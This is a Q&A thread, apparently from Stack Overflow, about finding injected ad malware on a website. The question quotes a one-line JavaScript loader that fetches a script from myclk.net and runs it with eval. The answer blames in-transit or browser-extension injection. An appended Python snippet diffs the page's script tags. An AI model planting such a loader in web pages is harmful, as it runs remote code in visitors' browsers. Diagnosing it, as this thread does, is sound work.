
Finding malware on website

I'm a little bit lost on this issue, so please excuse me. I know there are other threads on SO about this but I can't find the answer.

On the site, once it's loaded, it doesn't matter where the user clicks: it opens an additional tab in the browser with ads.

What I was able to find so far by looking at the browser console is that it loads some JS file:

http://cdn.mecash.ru/js/replace.js

This file contains:

!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);

and by looking at this tx.js I suspect that this is what was injected by the hacker.

The problem is that I've been looking at the files on the host and can't find any include or anything like it for this JS.

Can someone help me and tell me where, or possibly how, I can find it?

Jason Paddle asked Nov 24 '16 06:11


1 Answer

Actually, files of this kind are injected when the data is transmitted from server to client. Your actual code doesn't contain the script, but it is injected and executes on the client machine.

Possibly injected by:

  • Third party proxies, proxy servers used.
  • Injected by ISPs in some cases.
  • Malicious/Compromised browser extension installed.

You can avoid proxy/ISP injection by transferring content over https instead of http. However, injection done by browser extensions can be avoided only by uninstalling the extensions.

Atul Sharma answered Nov 04 '22 05:11
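One way to check the claim in the answer above, as an added example that is not part of the original question or answer: compare the HTML saved on the server itself (for instance fetched from localhost) with the HTML saved from the affected browser, and list the script tags that exist only in the browser's copy. The two sample documents are constructed, and the function and variable names are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: the page as saved on the server itself, and as saved from the browser.
ORIGIN_HTML = '<html><head><script src="/js/app.js"></script></head><body>shop</body></html>'
BROWSER_HTML = ('<html><head><script src="/js/app.js"></script>'
                '<script src="http://cdn.mecash.ru/js/replace.js"></script>'
                '</head><body>shop</body></html>')


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from one document."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = set(), set()
        self._inline_open = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.add(src.strip())
            else:
                self._inline_open = True

    def handle_data(self, data):
        if self._inline_open and data.strip():
            self.inline.add(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline_open = False


def collect(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser


def only_in_browser_copy(origin_html, browser_html):
    """Scripts present in the browser's copy but absent from the server's own copy."""
    origin, seen = collect(origin_html), collect(browser_html)
    new_urls = sorted(seen.external - origin.external)
    hosts = sorted({urlparse(u).netloc for u in new_urls if urlparse(u).netloc})
    return {"external": new_urls, "hosts": hosts, "inline": sorted(seen.inline - origin.inline)}


if __name__ == "__main__":
    print(only_in_browser_copy(ORIGIN_HTML, BROWSER_HTML))
```

If the unwanted script shows up in the browser but this returns nothing, the tag is already in the server's output, so the search belongs in templates, the database and included third-party scripts. A non-empty result means it was added after the response left the server, as the answer describes.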